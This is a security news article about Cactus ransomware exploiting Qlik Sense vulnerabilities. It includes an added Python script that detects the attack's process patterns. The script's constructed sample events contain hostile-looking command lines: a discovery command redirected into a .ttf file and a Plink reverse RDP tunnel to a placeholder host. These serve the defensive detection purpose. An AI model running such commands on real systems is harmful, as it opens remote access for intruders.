Cactus Ransomware Exploits Qlik Sense Vulnerabilities for Intrusion

Cactus ransomware has homed in on critical weaknesses in Qlik Sense, a data analytics solution, exploiting these vulnerabilities to breach corporate networks. Qlik Sense, known for its capacity to interactively visualize data and generate custom reports from various data sources, has faced security challenges that Cactus ransomware has aggressively targeted.

In a recent development, Qlik Sense, available for local and cloud-based usage, faced significant security vulnerabilities in its Windows version. These vulnerabilities, disclosed late August, comprised two critical flaws. CVE-2023-41266, a path traversal bug, facilitated anonymous session generation and unauthorized HTTP requests, while CVE-2023-41265, with a severity rating of 9.8, allowed unauthenticated users to elevate privileges and execute HTTP requests on the backend server without authentication.

Despite the vendor’s release of security updates, subsequent discovery revealed the inadequacy of the fix for CVE-2023-41265, leading to the identification of a new vulnerability, CVE-2023-48365.

A cybersecurity firm has sounded the alarm, reporting active exploitation of these vulnerabilities by Cactus ransomware across unpatched, publicly exposed Qlik Sense instances. Their observations reveal the ransomware’s strategy of initiating new processes through the exploitation of Qlik Sense Scheduler services using PowerShell and BITS.

To establish persistence and remote access, the attackers employ tools like ManageEngine UEMS executables camouflaged as Qlik files, official AnyDesk downloads, and a disguised Plink binary. Furthermore, they execute discovery commands and redirect the output into .TTF files, which can then be read back through the path traversal flaw to retrieve the command results.

The attackers’ tactics extend to evading detection by uninstalling antivirus, changing administrator passwords, and creating RDP tunnels through the Plink command-line connection tool. The final stages involve deploying the Cactus ransomware onto compromised systems.
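The behaviours described above (the Qlik Sense Scheduler service spawning PowerShell or BITS, discovery output redirected into .TTF files, and Plink used to tunnel RDP) are all visible in ordinary process-creation telemetry. The following is an added detection example, not code from the original article or from the researchers it cites. It assumes Sysmon-style field names, that the Scheduler service binary is `Scheduler.exe` under the Qlik install directory, and treats cmd.exe as a suspicious child because `>` redirection normally runs through it; the sample events are constructed.

```python
"""Added detection example (not from the original article): triage Windows
process-creation events for the behaviours attributed to Cactus in the text.
All sample events below are constructed for this example, not real telemetry."""
import re
from typing import Dict, List

# Assumption: the Qlik Sense Scheduler service binary is Scheduler.exe under
# the Qlik install directory; adjust the pattern to your deployment.
SCHEDULER_PARENT = re.compile(r"\\qlik\\.*\\scheduler\.exe$", re.IGNORECASE)
# PowerShell and BITS are named in the article; cmd.exe is an assumption,
# added because '>' redirection normally runs through it.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "bitsadmin.exe", "cmd.exe"}
# Any command whose output is redirected into a .ttf file.
TTF_REDIRECT = re.compile(r'>\s*"?[^">]*\.ttf\b', re.IGNORECASE)
# Plink with the RDP port on its command line (heuristic for an RDP tunnel).
RDP_PORT = re.compile(r"\b3389\b")


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event: Dict[str, str]) -> List[str]:
    """Return the detection labels that fire for one process-creation event."""
    findings: List[str] = []
    parent = event.get("ParentImage", "")
    child = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if SCHEDULER_PARENT.search(parent) and child in SUSPICIOUS_CHILDREN:
        findings.append("qlik_scheduler_spawned_shell")
    if TTF_REDIRECT.search(cmd):
        findings.append("command_output_redirected_to_ttf")
    if child == "plink.exe" and RDP_PORT.search(cmd):
        findings.append("plink_rdp_tunnel")
    return findings


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each event id to its findings, keeping only events that fired."""
    results: Dict[str, List[str]] = {}
    for event in events:
        hits = triage_event(event)
        if hits:
            results[event["EventId"]] = hits
    return results


# Constructed sample telemetry (Sysmon-style field names); not real data.
SAMPLE_EVENTS = [
    {"EventId": "1",
     "ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"EventId": "2",
     "ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c whoami > "C:\Program Files\Qlik\Sense\Client\fonts\out.ttf"'},
    {"EventId": "3",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\Public\plink.exe",
     "CommandLine": "plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.5"},
    {"EventId": "4",  # benign: interactive PowerShell launched from Explorer
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(hits))
```

Running the script prints one line per event that fired (events 1, 2 and 3) and stays silent for the benign Explorer-launched PowerShell. The parent/child pairing is the highest-signal rule here: a scheduler service for a BI product has no routine reason to spawn a shell, so a single hit merits investigation even without the other two indicators.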

These techniques align with earlier observed Cactus ransomware attacks, which emerged in March, leveraging double-extortion tactics by stealing and encrypting victim data on compromised systems. Previous attacks exploited VPN vulnerabilities to gain initial access. Additionally, researchers highlighted the ransomware’s use of encryption to evade security products.

Preventing Cactus ransomware attacks involves diligently applying patches and updating the software. Regularly monitoring and auditing network activity can aid in the early detection of potential vulnerabilities and suspicious activity. Implementing strong access controls, network segmentation, and regular offline backups of critical data are vital to mitigate the impact of potential attacks. Additionally, deploying robust endpoint security solutions and educating employees on recognizing and reporting suspicious activity can fortify defenses against ransomware intrusions.